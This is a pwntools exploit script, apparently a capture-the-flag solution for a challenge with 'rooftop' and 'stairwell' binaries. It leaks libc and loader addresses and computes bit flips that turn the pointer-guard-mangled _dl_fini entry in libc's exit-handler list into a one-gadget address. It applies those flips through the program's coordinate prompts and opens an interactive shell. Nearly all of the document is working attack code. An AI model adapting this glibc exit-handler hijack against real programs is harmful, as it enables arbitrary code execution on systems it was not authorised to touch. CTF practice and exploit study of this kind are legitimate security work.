#!/usr/bin/env python
from pwn import *

HOST = "challs.polygl0ts.ch"
PORT = 6008
context.aslr = False

exe = context.binary = ELF("./rooftop", checksec=False)
libc = ELF('./libc.so.6', checksec=False)
ld = ELF('./ld-linux-x86-64.so.2', checksec=False)
context.terminal = "kitten @ launch --location=before --cwd=current --bias=65".split()
context.log_level = "debug"
context.encoding = "ascii"


def start(argv=[], *a, **kw):
    if args.ASLR:
        context.aslr = True

    if args.GDB or args.DBG:
        return gdb.debug([exe.path], gdbinit, env={}, *a, **kw)
    elif args.REMOTE:
        return remote(os.environ.get("HOST", HOST), int(os.environ.get("PORT", PORT)))
    elif args.DOCKER:
        return remote("localhost", 6008)
    return process([exe.path], *a, **kw)


# template end

def shoot(addr: int, idx: int):
    p.sendafter(b"X coordinate: ", hex(addr).encode('ascii'))
    p.sendafter(b"Y coordinate: ", hex(idx).encode('ascii'))

def advance():
    p.sendlineafter(b'>', b'')


gdbinit = """
tbreak main
set follow-fork-mode child
continue
""".format(**locals())

ind = -1
# lowest = 15

while True:
    context.log_level = 'critical'
    ind += 1
    print(f"run: {ind}")

    os.system("make")

    exe.address = libc.address = ld.address = 0
    exe = context.binary = ELF("./rooftop", checksec=False)
    
    p = start()

    advance()
    advance()
    advance()
    advance()
    advance()
    advance()
    advance()

    try:
        p.sendafter(b'X coordinate: ', b"3E335")
        p.sendafter(b'Y coordinate: ', b"0")
        advance()

        advance()
        advance()
        advance()
        advance()

        # now in the stairwell
        advance()
        exe = context.binary = ELF("./stairwell", checksec=False)
        # pause()

        advance()
        advance()
        
        libc.address = unpack(p.recvline(drop=True)) - libc.sym['read']
        ld.address = unpack(p.recvline(drop=True)) - 0x36000

        advance()
        advance()
        advance()
    
        print("LIBC: ", hex(libc.address))
        print("LD: ", hex(ld.address))

        onegadget = libc.address + 0xd8131
        print("one gadget: ", hex(onegadget))
        print("_dl_fini: ", hex(ld.sym['_dl_fini']))

        needed_flips: list[tuple[int, int]] = []

        for i in range(64):
            gadget_bit = onegadget & (1 << i)
            _dl_fini_bit = ld.sym['_dl_fini'] & (1 << i)
            if gadget_bit != _dl_fini_bit:
                # since ptr guard encryption/decryption is
                # def encrypt(fptr, ptr_guard):
                #     return rol(fptr ^ ptr_guard, 0x11, 64)
                # def decrypt(fptr, ptr_guard):
                #    	return ror(fptr, 0x11, 64) ^ ptr_guard
                # we need to follow along
                meow = (i + 0x11) % 64
                needed_flips.append((meow // 8, meow % 8))

        print(f"[+] need {len(needed_flips)} flips!")
        # lowest = min(lowest, len(needed_flips))
        # print(f"[+] min ever: {lowest}")

        if len(needed_flips) > 9:
            print("too many..")
            p.close()
            # exit()
            continue
        else:
            print("========= SUCCESS ============")
            context.log_level = 'debug'
        # gdb.attach(p)
        # pause()
        break

    except EOFError: 
        p.close()
    except ValueError as err:
        print("value error: ", err)
        p.close()
    except KeyboardInterrupt:
        print("ctrl-c pressed")
        exit()

target = libc.sym['initial'] + 0x18

for one_flip in needed_flips:
    byt, bit = one_flip
    shoot(target + byt, bit)

# do no-op if we have extra
extras = 9 - len(needed_flips)
for i in range(extras):
    shoot(libc.sym['stderr'], 0)

# p.sendline(b'cat flag.txt')
p.interactive()
p.close()
